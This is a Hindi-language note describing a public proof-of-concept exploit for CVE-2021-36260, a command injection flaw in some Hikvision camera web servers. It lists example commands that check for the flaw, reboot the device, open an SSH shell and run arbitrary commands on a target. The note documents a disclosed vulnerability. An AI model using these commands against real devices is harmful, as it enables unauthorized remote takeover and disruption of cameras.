
कुछ Hikvision उत्पादों के वेब सर्वर में कमांड इंजेक्शन कमजोरी। अपर्याप्त इनपुट सत्यापन के कारण, हमलावर दुर्भावनापूर्ण कमांड वाले कुछ संदेश भेजकर कमांड इंजेक्शन हमला शुरू करने के लिए इस कमजोरी का शोषण कर सकता है।
CVE-2021-36260 कुछ Hikvision उत्पादों के वेब सर्वर में कमांड इंजेक्शन भेद्यता का POC। अपर्याप्त इनपुट सत्यापन के कारण, हमलावर दुर्भावनापूर्ण कमांड वाले संदेश भेजकर कमांड इंजेक्शन हमला करने के लिए भेद्यता का शोषण कर सकता है।
शोषण शीर्षक: Hikvision वेब सर्वर बिल्ड 210702 - कमांड इंजेक्शन
शोषण लेखक: bashis
विक्रेता होमपेज: https://www.hikvision.com/
संस्करण: 1.0
CVE: CVE-2021-36260
संदर्भ: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
नोट:
[उदाहरण] सुरक्षित भेद्यता/सत्यापन जाँच: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
सुरक्षित और असुरक्षित भेद्यता/सत्यापन जाँच: (केवल 'unsafe check' का उपयोग करेगा यदि 'safe check' से सत्यापित नहीं हुआ) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
असुरक्षित भेद्यता/सत्यापन जाँच: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
SSH शेल लॉन्च करें और कनेक्ट करें: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
कमांड निष्पादित करें: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
अंधा कमांड निष्पादित करें: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"